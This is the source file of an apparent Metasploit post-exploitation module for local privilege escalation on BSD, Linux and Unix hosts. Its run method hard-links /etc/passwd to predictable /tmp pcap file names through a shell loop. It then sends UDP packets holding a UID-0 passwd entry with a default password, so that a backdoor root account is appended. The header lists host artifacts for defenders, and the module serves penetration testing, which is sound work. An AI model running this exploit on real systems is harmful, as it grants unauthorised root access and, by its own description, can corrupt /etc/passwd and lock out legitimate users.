Path: blob/master/modules/post/multi/escalate/metasploit_pcaplog.rb
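##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module targeting the predictable /tmp/msf3-session_*.pcap file names written by
# the pcap_log plugin of Metasploit < 4.4 (see the References below).
#
# Host-side artifacts a defender can look for: hard links named
# /tmp/msf3-session_<timestamp>.pcap that share an inode with /etc/passwd, a sudden
# growth of /etc/passwd, and a passwd entry whose GECOS field reads
# "Metasploit Root Account" with UID/GID 0.
class MetasploitModule < Msf::Post
  Rank = ManualRanking

  include Msf::Post::File

  include Msf::Exploit::Local::Linux

  # Registers module metadata and the USERNAME / PASSWORD / MINUTES / RPORT options.
  #
  # @param info [Hash] module info merged by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Multi Escalate Metasploit pcap_log Local Privilege Escalation',
        'Description' => %q{
          Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
          creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
          filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.
          This, and all the other packets, are appended to /etc/passwd.

          Successful exploitation results in the creation of a new superuser account.

          This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap
          files and truncate /etc/passwd. Note that if this module fails, you can potentially induce
          a permanent DoS on the target by corrupting the /etc/passwd file.
        },
        'License' => MSF_LICENSE,
        'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'],
        'Platform' => %w[bsd linux unix],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'References' => [
          [ 'BID', '54472' ],
          [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
          [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
        ],
        'DisclosureDate' => '2012-07-16',
        'Stance' => Msf::Exploit::Stance::Passive,
        'Notes' => {
          # /etc/passwd is modified in place; a partial write can leave the host unable to log in.
          'Stability' => [SERVICE_RESOURCE_LOSS],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )
    register_options(
      [
        Opt::RPORT(2940),
        OptString.new('USERNAME', [ true, 'Username for the new superuser', 'metasploit' ]),
        OptString.new('PASSWORD', [ true, 'Password for the new superuser', 'metasploit' ]),
        OptInt.new('MINUTES', [true, 'Number of minutes to try to inject', 5])
      ]
    )
  end

  # Absolute value of the MINUTES option, or 0 when the option is unset / not numeric.
  #
  # NOTE(review): nothing visible in this file calls this helper; `run` reads
  # `datastore['MINUTES']` directly. Kept as-is because it is part of the module's
  # public surface.
  #
  # @return [Integer]
  def normalize_minutes
    datastore['MINUTES'].abs
  rescue StandardError
    0
  end

  # Runs the module against the current session.
  #
  # Aborts with Failure::NotFound when /etc/passwd is missing. Otherwise it loops for
  # up to MINUTES attempts: once per attempt it creates hard links in /tmp (one shell
  # command, because cmd_exec is slow), then sends one UDP datagram per second to
  # RPORT and stops as soon as the line count of /etc/passwd changes. Finally it
  # reports whether the marker string ended up in /etc/passwd.
  #
  # The link step presumes /tmp and /etc/passwd live on the same filesystem and that
  # the target permits hard links to files the session user does not own
  # (on Linux, fs.protected_hardlinks=1 denies that) -- TODO confirm against target.
  #
  # @return [void]
  def run
    fail_with(Failure::NotFound, '/etc/passwd not found on system') unless file_exist?('/etc/passwd')

    initial_size = read_file('/etc/passwd').lines.count
    print_status("/etc/passwd is currently #{initial_size} lines long")

    print_status("Setting up the victim's /tmp dir")

    username = datastore['USERNAME']
    i = 0 # seconds elapsed within the current attempt (wraps at 60)
    j = 0 # number of link attempts made so far
    loop do
      # Setup links to /etc/passwd
      if i.zero?
        j += 1
        break if j >= datastore['MINUTES'] + 1 # Give up after X minutes

        # 0a2940: cmd_exec is slow, so send 1 command to do all the links
        print_status("Linking /etc/passwd to predictable tmp files (Attempt #{j})")
        cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
      end

      current_size = read_file('/etc/passwd').lines.count

      # passwd file line count has changed
      break if current_size != initial_size

      # PCAP is flowing
      # Traditional DES crypt(3) with a fixed two-character salt, as the original author chose.
      pkt = "\n\n#{username}:#{datastore['PASSWORD'].crypt('0a')}:0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
      vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}")
      udpsock = Rex::Socket::Udp.create(
        {
          'Context' => { 'Msf' => framework, 'MsfExploit' => self }
        }
      )
      begin
        udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
      ensure
        # One socket is created per iteration; close it so a long run does not leak descriptors.
        udpsock.close
      end
      sleep(1) # wait a second
      i = (i + 1) % 60 # increment second counter
    end

    # String#include? -- the original spelled this `includes?`, which does not exist and
    # would raise NoMethodError right after the loop, masking the outcome.
    if read_file('/etc/passwd').include?('Metasploit')
      print_good("Success. You should now be able to login or su to the '#{username}' account")
      # TODO: Consider recording our now-created username and password as a valid credential here.
    else
      print_error("Failed, the '#{username}' user does not appear to have been added")
    end
    # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload
    # However because the session is not a terminal, su will not always allow this.
  end
end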